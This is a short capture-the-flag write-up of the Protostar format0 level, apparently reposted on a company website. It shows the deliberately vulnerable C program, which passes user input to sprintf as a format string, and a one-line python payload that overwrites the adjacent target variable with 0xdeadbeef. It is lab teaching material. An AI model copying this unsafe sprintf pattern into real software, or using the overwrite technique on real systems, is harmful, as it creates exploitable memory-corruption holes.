Protostarformat0

About

This level introduces format strings, and how attacker supplied format strings can modify the execution flow of programs.
Hints:
  • This level should be done in less than 10 bytes of input.
  • "Exploiting format string vulnerabilities"
This level is at /opt/protostar/bin/format0
#include #include #include #include
void vuln(char *string)
{
volatile int target;
char buffer[64];

target = 0;

sprintf(buffer, string);

if(target == 0xdeadbeef) {
    printf("you have hit the target correctly :)\n");
}
}

int main(int argc, char **argv)
{
vuln(argv[1]);
}

格式化字符串热身题,只需要将target部分覆盖也\xdeadbeef即可。因为在定义时,target和buffer是连着的,因此在内存的位置也是一起的。故可得:

user@protostar:/opt/protostar/bin$ ./format0 $(python -c 'print "a"*64+"\xef\xbe\xad\xde"')
you have hit the target correctly :)


标题名称:Protostarformat0
路径分享:http://bzwzjz.com/article/jihsdd.html

其他资讯

Copyright © 2007-2020 广东宝晨空调科技有限公司 All Rights Reserved 粤ICP备2022107769号
友情链接: 专业网站建设 成都企业网站建设公司 高端定制网站设计 成都网站建设公司 手机网站建设套餐 成都网站设计 企业网站建设公司 营销型网站建设 成都网站建设流程 成都营销网站制作 自适应网站设计 企业网站设计 成都网站建设 成都网站建设 企业网站设计 成都网站制作 重庆外贸网站建设 响应式网站设计 企业网站设计 温江网站设计 攀枝花网站设计 网站建设公司